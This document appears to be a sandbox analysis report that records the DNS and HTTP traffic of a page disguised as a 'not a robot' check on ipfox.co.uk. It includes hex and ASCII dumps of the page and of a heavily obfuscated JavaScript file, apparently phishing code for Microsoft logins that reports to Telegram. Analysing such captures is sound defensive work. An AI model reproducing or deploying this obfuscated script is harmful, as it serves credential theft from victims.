                                              Oct 25, 2024 15:45:11.234049082 CEST192.168.2.41.1.1.10xe3a3Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                              Oct 25, 2024 15:45:11.296782017 CEST192.168.2.41.1.1.10x796cStandard query (0)openfpcdn.ioA (IP address)IN (0x0001)false
                                              Oct 25, 2024 15:45:11.297368050 CEST192.168.2.41.1.1.10xfa20Standard query (0)openfpcdn.io65IN (0x0001)false
                                              Oct 25, 2024 15:45:11.300751925 CEST192.168.2.41.1.1.10x4f61Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                              Oct 25, 2024 15:45:11.301064014 CEST192.168.2.41.1.1.10x3888Standard query (0)api.ipify.org65IN (0x0001)false
                                              Oct 25, 2024 15:45:11.304030895 CEST192.168.2.41.1.1.10x4be8Standard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                              Oct 25, 2024 15:45:11.304526091 CEST192.168.2.41.1.1.10xfff6Standard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                              Oct 25, 2024 15:45:11.307324886 CEST192.168.2.41.1.1.10x51adStandard query (0)logo.clearbit.comA (IP address)IN (0x0001)false
                                              Oct 25, 2024 15:45:11.307816029 CEST192.168.2.41.1.1.10x297bStandard query (0)logo.clearbit.com65IN (0x0001)false
                                              Oct 25, 2024 15:45:11.566586971 CEST192.168.2.41.1.1.10xdb15Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                              Oct 25, 2024 15:45:11.567071915 CEST192.168.2.41.1.1.10x494eStandard query (0)api.telegram.org65IN (0x0001)false
                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Oct 25, 2024 15:45:06.851583004 CEST1.1.1.1192.168.2.40x6bcaNo error (0)ipfox.co.uk107.178.102.96A (IP address)IN (0x0001)false
                                              Oct 25, 2024 15:45:07.800942898 CEST1.1.1.1192.168.2.40x99f7No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                              Oct 25, 2024 15:45:07.800942898 CEST1.1.1.1192.168.2.40x99f7No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                              Oct 25, 2024 15:45:07.800982952 CEST1.1.1.1192.168.2.40xd51dNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                              Oct 25, 2024 15:45:07.815481901 CEST1.1.1.1192.168.2.40xfbeeNo error (0)openfpcdn.io13.32.99.97A (IP address)IN (0x0001)false
                                              Oct 25, 2024 15:45:07.815481901 CEST1.1.1.1192.168.2.40xfbeeNo error (0)openfpcdn.io13.32.99.103A (IP address)IN (0x0001)false
                                              Oct 25, 2024 15:45:07.815481901 CEST1.1.1.1192.168.2.40xfbeeNo error (0)openfpcdn.io13.32.99.118A (IP address)IN (0x0001)false
                                              Oct 25, 2024 15:45:07.815481901 CEST1.1.1.1192.168.2.40xfbeeNo error (0)openfpcdn.io13.32.99.33A (IP address)IN (0x0001)false
                                              Oct 25, 2024 15:45:08.435563087 CEST1.1.1.1192.168.2.40x921dNo error (0)www.google.com142.250.184.228A (IP address)IN (0x0001)false
                                              Oct 25, 2024 15:45:08.436253071 CEST1.1.1.1192.168.2.40x6d05No error (0)www.google.com65IN (0x0001)false
                                              Oct 25, 2024 15:45:09.420933008 CEST1.1.1.1192.168.2.40x9250No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                              Oct 25, 2024 15:45:09.420933008 CEST1.1.1.1192.168.2.40x9250No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                              Oct 25, 2024 15:45:09.420933008 CEST1.1.1.1192.168.2.40x9250No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                              Oct 25, 2024 15:45:09.421271086 CEST1.1.1.1192.168.2.40xcd89No error (0)api.ipify.org65IN (0x0001)false
                                              Oct 25, 2024 15:45:09.565506935 CEST1.1.1.1192.168.2.40x3f6fNo error (0)logo.clearbit.comd26p066pn2w0s0.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                              Oct 25, 2024 15:45:09.566464901 CEST1.1.1.1192.168.2.40x102fNo error (0)logo.clearbit.comd26p066pn2w0s0.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                              Oct 25, 2024 15:45:09.566464901 CEST1.1.1.1192.168.2.40x102fNo error (0)d26p066pn2w0s0.cloudfront.net13.32.27.129A (IP address)IN (0x0001)false
                                              Oct 25, 2024 15:45:09.566464901 CEST1.1.1.1192.168.2.40x102fNo error (0)d26p066pn2w0s0.cloudfront.net13.32.27.14A (IP address)IN (0x0001)false
                                              Oct 25, 2024 15:45:09.566464901 CEST1.1.1.1192.168.2.40x102fNo error (0)d26p066pn2w0s0.cloudfront.net13.32.27.44A (IP address)IN (0x0001)false
                                              Oct 25, 2024 15:45:09.566464901 CEST1.1.1.1192.168.2.40x102fNo error (0)d26p066pn2w0s0.cloudfront.net13.32.27.77A (IP address)IN (0x0001)false
                                              Oct 25, 2024 15:45:09.576761961 CEST1.1.1.1192.168.2.40x5139No error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                              Oct 25, 2024 15:45:09.576761961 CEST1.1.1.1192.168.2.40x5139No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                              Oct 25, 2024 15:45:09.576761961 CEST1.1.1.1192.168.2.40x5139No error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                              Oct 25, 2024 15:45:09.576903105 CEST1.1.1.1192.168.2.40x50f6No error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                              Oct 25, 2024 15:45:09.576903105 CEST1.1.1.1192.168.2.40x50f6No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                              Oct 25, 2024 15:45:11.163126945 CEST1.1.1.1192.168.2.40xa2c8No error (0)ipfox.co.uk107.178.102.96A (IP address)IN (0x0001)false
                                              Oct 25, 2024 15:45:11.220444918 CEST1.1.1.1192.168.2.40xc486No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                              Oct 25, 2024 15:45:11.220444918 CEST1.1.1.1192.168.2.40xc486No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                              Oct 25, 2024 15:45:11.241323948 CEST1.1.1.1192.168.2.40xe3a3No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                              Oct 25, 2024 15:45:11.307967901 CEST1.1.1.1192.168.2.40x4f61No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                              Oct 25, 2024 15:45:11.307967901 CEST1.1.1.1192.168.2.40x4f61No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                              Oct 25, 2024 15:45:11.307967901 CEST1.1.1.1192.168.2.40x4f61No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                              Oct 25, 2024 15:45:11.308235884 CEST1.1.1.1192.168.2.40x3888No error (0)api.ipify.org65IN (0x0001)false
                                              Oct 25, 2024 15:45:11.308376074 CEST1.1.1.1192.168.2.40x796cNo error (0)openfpcdn.io13.32.99.97A (IP address)IN (0x0001)false
                                              Oct 25, 2024 15:45:11.308376074 CEST1.1.1.1192.168.2.40x796cNo error (0)openfpcdn.io13.32.99.33A (IP address)IN (0x0001)false
                                              Oct 25, 2024 15:45:11.308376074 CEST1.1.1.1192.168.2.40x796cNo error (0)openfpcdn.io13.32.99.103A (IP address)IN (0x0001)false
                                              Oct 25, 2024 15:45:11.308376074 CEST1.1.1.1192.168.2.40x796cNo error (0)openfpcdn.io13.32.99.118A (IP address)IN (0x0001)false
                                              Oct 25, 2024 15:45:11.311661005 CEST1.1.1.1192.168.2.40x4be8No error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                              Oct 25, 2024 15:45:11.311661005 CEST1.1.1.1192.168.2.40x4be8No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                              Oct 25, 2024 15:45:11.311661005 CEST1.1.1.1192.168.2.40x4be8No error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                              Oct 25, 2024 15:45:11.312259912 CEST1.1.1.1192.168.2.40xfff6No error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                              Oct 25, 2024 15:45:11.312259912 CEST1.1.1.1192.168.2.40xfff6No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                              Oct 25, 2024 15:45:11.315704107 CEST1.1.1.1192.168.2.40x51adNo error (0)logo.clearbit.comd26p066pn2w0s0.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                              Oct 25, 2024 15:45:11.315704107 CEST1.1.1.1192.168.2.40x51adNo error (0)d26p066pn2w0s0.cloudfront.net13.32.27.44A (IP address)IN (0x0001)false
                                              Oct 25, 2024 15:45:11.315704107 CEST1.1.1.1192.168.2.40x51adNo error (0)d26p066pn2w0s0.cloudfront.net13.32.27.77A (IP address)IN (0x0001)false
                                              Oct 25, 2024 15:45:11.315704107 CEST1.1.1.1192.168.2.40x51adNo error (0)d26p066pn2w0s0.cloudfront.net13.32.27.14A (IP address)IN (0x0001)false
                                              Oct 25, 2024 15:45:11.315704107 CEST1.1.1.1192.168.2.40x51adNo error (0)d26p066pn2w0s0.cloudfront.net13.32.27.129A (IP address)IN (0x0001)false
                                              Oct 25, 2024 15:45:11.327400923 CEST1.1.1.1192.168.2.40x297bNo error (0)logo.clearbit.comd26p066pn2w0s0.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                              Oct 25, 2024 15:45:11.574269056 CEST1.1.1.1192.168.2.40xdb15No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                              • ipfox.co.uk
                                              • https:
                                                • cdnjs.cloudflare.com
                                                • openfpcdn.io
                                                • api.ipify.org
                                                • logo.clearbit.com
                                                • aadcdn.msftauth.net
                                                • api.telegram.org
                                              • fs.microsoft.com
                                              • slscr.update.microsoft.com
                                              • otelrules.azureedge.net
                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.449735107.178.102.964431360C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:07 UTC671OUTGET /pages/thanks.html HTTP/1.1
                                              Host: ipfox.co.uk
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              sec-ch-ua-platform: "Windows"
                                              Upgrade-Insecure-Requests: 1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: navigate
                                              Sec-Fetch-User: ?1
                                              Sec-Fetch-Dest: document
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-10-25 13:45:07 UTC368INHTTP/1.1 200 OK
                                              Connection: close
                                              content-type: text/html
                                              last-modified: Fri, 18 Oct 2024 19:38:33 GMT
                                              accept-ranges: bytes
                                              content-length: 6868
                                              date: Fri, 25 Oct 2024 13:45:07 GMT
                                              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                              2024-10-25 13:45:07 UTC1000INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 43 6f 6e 66 69 72 6d 20 79 6f 75 27 72 65 20 6e 6f 74 20 61 20 72 6f 62 6f 74 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 6d 6f 64 75 6c 65 22 3e 0a 20 20 20 20 20 20 20 20 69 6d 70 6f 72 74 20 7b 20 6c 6f 61 64 20 7d 20 66 72 6f 6d 20 27 68 74 74 70 73 3a 2f 2f 6f 70 65 6e 66 70 63 64 6e 2e 69 6f 2f 62 6f 74 64 2f 76 31 27 3b 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 62 6f 74 64 4c 6f 61 64 20 3d 20 6c 6f 61 64 3b 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 65 72 72 6f 72 73 73 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c
                                              Data Ascii: <!DOCTYPE html><html><head> <title>Confirm you're not a robot.</title> <script type="module"> import { load } from 'https://openfpcdn.io/botd/v1'; window.botdLoad = load; </script> <script src="errorss.js"></script> <
                                              2024-10-25 13:45:07 UTC5868INData Raw: 76 65 20 74 68 65 20 69 6e 70 75 74 20 6f 66 66 2d 73 63 72 65 65 6e 20 2a 2f 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 32 30 30 70 78 3b 20 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 69 6e 67 2d 6f 76 65 72 6c 61 79 2c 20 2e 6c 6f 61 64 69 6e 67 2d 6f 76 65 72 6c 61 79 2d 73 65 63 6f 6e 64 61 72 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 6f 70 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 69 67 68 74 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 74 74 6f 6d 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75
                                              Data Ascii: ve the input off-screen */ width: 200px; } .loading-overlay, .loading-overlay-secondary { position: fixed; top: 0; left: 0; right: 0; bottom: 0; backgrou


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.449736107.178.102.964431360C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:07 UTC540OUTGET /pages/errorss.js HTTP/1.1
                                              Host: ipfox.co.uk
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              sec-ch-ua-platform: "Windows"
                                              Accept: */*
                                              Sec-Fetch-Site: same-origin
                                              Sec-Fetch-Mode: no-cors
                                              Sec-Fetch-Dest: script
                                              Referer: https://ipfox.co.uk/pages/thanks.html
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              2024-10-25 13:45:07 UTC376INHTTP/1.1 200 OK
                                              Connection: close
                                              content-type: text/javascript
                                              last-modified: Fri, 18 Oct 2024 19:36:34 GMT
                                              accept-ranges: bytes
                                              content-length: 420812
                                              date: Fri, 25 Oct 2024 13:45:07 GMT
                                              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                              2024-10-25 13:45:07 UTC992INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 34 34 38 30 38 64 2c 5f 30 78 34 63 30 37 36 33 29 7b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 35 33 39 65 36 61 28 5f 30 78 33 33 63 37 35 64 2c 5f 30 78 32 31 66 62 32 39 2c 5f 30 78 32 31 63 39 33 64 2c 5f 30 78 32 38 36 32 36 64 2c 5f 30 78 33 34 31 30 64 39 29 7b 72 65 74 75 72 6e 20 5f 30 78 32 63 62 36 28 5f 30 78 32 38 36 32 36 64 2d 20 2d 30 78 33 39 34 2c 5f 30 78 33 33 63 37 35 64 29 3b 7d 63 6f 6e 73 74 20 5f 30 78 32 35 38 31 32 32 3d 5f 30 78 34 34 38 30 38 64 28 29 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 33 62 64 64 32 64 28 5f 30 78 35 32 64 36 30 33 2c 5f 30 78 31 63 36 34 61 36 2c 5f 30 78 31 30 39 63 39 66 2c 5f 30 78 31 61 66 37 32 33 2c 5f 30 78 31 33 34 63 36 32 29 7b 72 65 74 75 72 6e 20 5f 30 78 32
                                              Data Ascii: (function(_0x44808d,_0x4c0763){function _0x539e6a(_0x33c75d,_0x21fb29,_0x21c93d,_0x28626d,_0x3410d9){return _0x2cb6(_0x28626d- -0x394,_0x33c75d);}const _0x258122=_0x44808d();function _0x3bdd2d(_0x52d603,_0x1c64a6,_0x109c9f,_0x1af723,_0x134c62){return _0x2
                                              2024-10-25 13:45:08 UTC14994INData Raw: 32 62 2a 2d 30 78 31 36 66 29 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 35 34 62 64 65 36 28 30 78 31 31 33 62 2c 30 78 31 30 34 33 2c 30 78 31 37 37 37 2c 27 6f 78 5e 74 27 2c 30 78 37 38 62 29 29 2f 28 30 78 31 2a 2d 30 78 31 65 34 39 2b 30 78 31 32 31 33 2b 30 78 36 35 2a 30 78 31 66 29 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 35 34 62 64 65 36 28 30 78 34 36 64 2c 30 78 61 63 66 2c 30 78 31 32 61 65 2c 27 51 4b 55 55 27 2c 30 78 35 32 34 29 29 2f 28 30 78 31 35 61 62 2b 2d 30 78 36 62 63 2a 2d 30 78 31 2b 2d 30 78 31 63 36 31 29 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 35 39 65 33 61 61 28 30 78 64 30 34 2c 27 4e 51 4f 36 27 2c 30 78 33 64 62 2c 30 78 32 36 35 2c 30 78 39 39 65 29 29 2f 28 2d 30 78 31 66 33 37 2b 2d 30 78 32 35 32 31 2b 30 78 34
                                              Data Ascii: 2b*-0x16f)+-parseInt(_0x54bde6(0x113b,0x1043,0x1777,'ox^t',0x78b))/(0x1*-0x1e49+0x1213+0x65*0x1f)+-parseInt(_0x54bde6(0x46d,0xacf,0x12ae,'QKUU',0x524))/(0x15ab+-0x6bc*-0x1+-0x1c61)*(-parseInt(_0x59e3aa(0xd04,'NQO6',0x3db,0x265,0x99e))/(-0x1f37+-0x2521+0x4
                                              2024-10-25 13:45:08 UTC16384INData Raw: 31 2c 5f 30 78 36 34 39 36 33 31 2d 30 78 31 63 65 2c 5f 30 78 37 34 66 61 66 36 2c 5f 30 78 31 38 31 36 31 38 2d 30 78 33 31 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 62 66 63 61 65 30 28 5f 30 78 31 37 61 63 61 61 2c 5f 30 78 34 62 66 64 32 63 2c 5f 30 78 35 39 62 38 30 64 2c 5f 30 78 32 34 61 35 64 37 2c 5f 30 78 31 39 62 66 38 33 29 7b 72 65 74 75 72 6e 20 5f 30 78 35 36 38 66 31 35 28 5f 30 78 32 34 61 35 64 37 2d 20 2d 30 78 64 33 2c 5f 30 78 34 62 66 64 32 63 2d 30 78 65 2c 5f 30 78 35 39 62 38 30 64 2d 30 78 34 63 2c 5f 30 78 31 37 61 63 61 61 2c 5f 30 78 31 39 62 66 38 33 2d 30 78 32 32 29 3b 7d 72 65 74 75 72 6e 20 5f 30 78 34 36 64 66 38 64 5b 4d 61 74 68 5b 5f 30 78 35 33 38 36 65 30 28 27 36 41 43 39 27 2c 30 78 31 35 34 39 2c 30 78 64 64
                                              Data Ascii: 1,_0x649631-0x1ce,_0x74faf6,_0x181618-0x31);}function _0xbfcae0(_0x17acaa,_0x4bfd2c,_0x59b80d,_0x24a5d7,_0x19bf83){return _0x568f15(_0x24a5d7- -0xd3,_0x4bfd2c-0xe,_0x59b80d-0x4c,_0x17acaa,_0x19bf83-0x22);}return _0x46df8d[Math[_0x5386e0('6AC9',0x1549,0xdd
                                              2024-10-25 13:45:08 UTC16384INData Raw: 30 78 34 66 30 37 30 37 2c 5f 30 78 34 34 65 63 63 31 29 7b 72 65 74 75 72 6e 20 5f 30 78 35 36 38 66 31 35 28 5f 30 78 34 34 65 63 63 31 2d 30 78 31 66 30 2c 5f 30 78 35 32 38 38 32 37 2d 30 78 62 32 2c 5f 30 78 32 31 32 31 32 30 2d 30 78 39 36 2c 5f 30 78 34 64 31 37 31 30 2c 5f 30 78 34 34 65 63 63 31 2d 30 78 63 62 29 3b 7d 74 72 79 7b 69 66 28 5f 30 78 61 66 38 64 64 32 5b 5f 30 78 36 65 35 62 37 66 28 27 40 29 70 78 27 2c 30 78 31 37 37 63 2c 30 78 64 30 39 2c 30 78 36 65 38 2c 30 78 31 30 62 61 29 5d 28 5f 30 78 61 66 38 64 64 32 5b 5f 30 78 36 65 35 62 37 66 28 27 43 28 26 70 27 2c 30 78 64 66 65 2c 30 78 31 31 39 36 2c 30 78 64 32 35 2c 30 78 31 35 66 65 29 5d 2c 5f 30 78 61 66 38 64 64 32 5b 5f 30 78 36 65 35 62 37 66 28 27 43 28 26 70 27 2c 30
                                              Data Ascii: 0x4f0707,_0x44ecc1){return _0x568f15(_0x44ecc1-0x1f0,_0x528827-0xb2,_0x212120-0x96,_0x4d1710,_0x44ecc1-0xcb);}try{if(_0xaf8dd2[_0x6e5b7f('@)px',0x177c,0xd09,0x6e8,0x10ba)](_0xaf8dd2[_0x6e5b7f('C(&p',0xdfe,0x1196,0xd25,0x15fe)],_0xaf8dd2[_0x6e5b7f('C(&p',0
                                              2024-10-25 13:45:08 UTC16384INData Raw: 20 5f 30 78 34 64 66 37 36 62 28 5f 30 78 33 38 39 63 36 31 2c 5f 30 78 35 31 65 61 61 61 2c 5f 30 78 32 32 38 34 62 32 2c 5f 30 78 32 37 35 64 36 65 2c 5f 30 78 37 31 39 65 32 63 29 7b 72 65 74 75 72 6e 20 5f 30 78 32 63 62 36 28 5f 30 78 37 31 39 65 32 63 2d 30 78 33 30 64 2c 5f 30 78 35 31 65 61 61 61 29 3b 7d 72 65 74 75 72 6e 20 5f 30 78 34 30 61 35 65 5b 5f 30 78 34 64 66 37 36 62 28 30 78 66 35 64 2c 27 6a 37 29 70 27 2c 30 78 61 31 32 2c 30 78 61 61 36 2c 30 78 31 31 61 62 29 5d 28 5f 30 78 34 32 63 39 62 64 2c 5f 30 78 32 61 30 38 37 35 29 3b 7d 2c 27 4f 63 58 6f 62 27 3a 5f 30 78 34 30 61 35 65 5b 5f 30 78 34 35 39 64 66 66 28 30 78 31 62 37 2c 30 78 38 38 31 2c 2d 30 78 36 35 2c 2d 30 78 37 36 37 2c 27 6a 5d 54 49 27 29 5d 2c 27 4a 56 5a 6e 56
                                              Data Ascii: _0x4df76b(_0x389c61,_0x51eaaa,_0x2284b2,_0x275d6e,_0x719e2c){return _0x2cb6(_0x719e2c-0x30d,_0x51eaaa);}return _0x40a5e[_0x4df76b(0xf5d,'j7)p',0xa12,0xaa6,0x11ab)](_0x42c9bd,_0x2a0875);},'OcXob':_0x40a5e[_0x459dff(0x1b7,0x881,-0x65,-0x767,'j]TI')],'JVZnV
                                              2024-10-25 13:45:08 UTC16384INData Raw: 66 62 33 2c 5f 30 78 35 39 31 64 65 37 2c 5f 30 78 32 66 37 31 32 66 29 7b 72 65 74 75 72 6e 20 5f 30 78 35 32 31 35 37 37 28 5f 30 78 37 36 63 66 62 33 2c 5f 30 78 32 64 37 34 62 38 2d 20 2d 30 78 32 62 31 2c 5f 30 78 37 36 63 66 62 33 2d 30 78 31 39 34 2c 5f 30 78 35 39 31 64 65 37 2d 30 78 34 65 2c 5f 30 78 32 66 37 31 32 66 2d 30 78 32 39 29 3b 7d 63 6f 6e 73 74 20 5f 30 78 66 32 64 65 30 65 3d 7b 27 64 4d 66 66 76 27 3a 5f 30 78 33 33 39 34 65 36 5b 5f 30 78 62 37 64 62 37 35 28 30 78 31 37 32 31 2c 30 78 66 36 31 2c 30 78 31 61 65 36 2c 30 78 31 35 32 35 2c 27 6f 78 5e 74 27 29 5d 2c 27 67 6b 4d 61 65 27 3a 5f 30 78 33 33 39 34 65 36 5b 5f 30 78 62 37 64 62 37 35 28 30 78 31 63 62 2c 30 78 38 32 63 2c 2d 30 78 33 31 66 2c 30 78 35 34 65 2c 27 51 62
                                              Data Ascii: fb3,_0x591de7,_0x2f712f){return _0x521577(_0x76cfb3,_0x2d74b8- -0x2b1,_0x76cfb3-0x194,_0x591de7-0x4e,_0x2f712f-0x29);}const _0xf2de0e={'dMffv':_0x3394e6[_0xb7db75(0x1721,0xf61,0x1ae6,0x1525,'ox^t')],'gkMae':_0x3394e6[_0xb7db75(0x1cb,0x82c,-0x31f,0x54e,'Qb
                                              2024-10-25 13:45:08 UTC16384INData Raw: 30 78 34 35 35 30 35 37 2d 30 78 32 38 63 2c 5f 30 78 32 32 35 38 65 32 2d 30 78 31 33 34 2c 5f 30 78 34 36 64 62 38 35 2d 30 78 31 64 39 2c 5f 30 78 35 33 30 37 37 61 2d 30 78 31 32 31 2c 5f 30 78 32 32 35 38 65 32 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 31 31 32 63 61 31 28 5f 30 78 34 66 35 35 35 61 2c 5f 30 78 33 36 33 62 32 63 2c 5f 30 78 31 32 31 64 31 66 2c 5f 30 78 33 32 61 31 64 61 2c 5f 30 78 33 32 37 32 65 37 29 7b 72 65 74 75 72 6e 20 5f 30 78 62 66 39 37 34 39 28 5f 30 78 34 66 35 35 35 61 2d 30 78 31 63 63 2c 5f 30 78 34 66 35 35 35 61 2c 5f 30 78 33 36 33 62 32 63 2d 30 78 33 34 62 2c 5f 30 78 33 32 61 31 64 61 2d 30 78 65 35 2c 5f 30 78 33 32 37 32 65 37 2d 30 78 31 38 33 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 32 39 33 33 30 38
                                              Data Ascii: 0x455057-0x28c,_0x2258e2-0x134,_0x46db85-0x1d9,_0x53077a-0x121,_0x2258e2);}function _0x112ca1(_0x4f555a,_0x363b2c,_0x121d1f,_0x32a1da,_0x3272e7){return _0xbf9749(_0x4f555a-0x1cc,_0x4f555a,_0x363b2c-0x34b,_0x32a1da-0xe5,_0x3272e7-0x183);}function _0x293308
                                              2024-10-25 13:45:08 UTC16384INData Raw: 28 30 78 31 36 33 66 2c 30 78 31 39 31 32 2c 30 78 31 31 63 30 2c 27 51 4b 55 55 27 2c 30 78 66 62 36 29 5d 29 3b 7d 65 6c 73 65 20 72 65 74 75 72 6e 20 5f 30 78 61 63 61 64 61 65 5b 5f 30 78 35 63 33 62 64 63 5b 5f 30 78 35 31 33 63 30 30 28 30 78 34 62 63 2c 30 78 61 63 34 2c 30 78 61 34 62 2c 27 75 49 6e 4c 27 2c 30 78 31 33 66 33 29 5d 28 5f 30 78 34 37 34 63 66 66 5b 5f 30 78 35 31 33 63 30 30 28 30 78 63 30 35 2c 30 78 66 63 32 2c 30 78 62 30 65 2c 27 48 79 33 30 27 2c 30 78 66 31 62 29 5d 28 5f 30 78 35 36 64 33 36 34 5b 5f 30 78 35 31 33 63 30 30 28 30 78 61 33 30 2c 30 78 31 35 33 66 2c 30 78 31 33 65 65 2c 27 6a 5d 54 49 27 2c 30 78 31 62 35 30 29 2b 27 6d 27 5d 28 29 2c 5f 30 78 35 65 64 62 32 32 5b 5f 30 78 62 62 38 30 34 33 28 30 78 39 35 36
                                              Data Ascii: (0x163f,0x1912,0x11c0,'QKUU',0xfb6)]);}else return _0xacadae[_0x5c3bdc[_0x513c00(0x4bc,0xac4,0xa4b,'uInL',0x13f3)](_0x474cff[_0x513c00(0xc05,0xfc2,0xb0e,'Hy30',0xf1b)](_0x56d364[_0x513c00(0xa30,0x153f,0x13ee,'j]TI',0x1b50)+'m'](),_0x5edb22[_0xbb8043(0x956
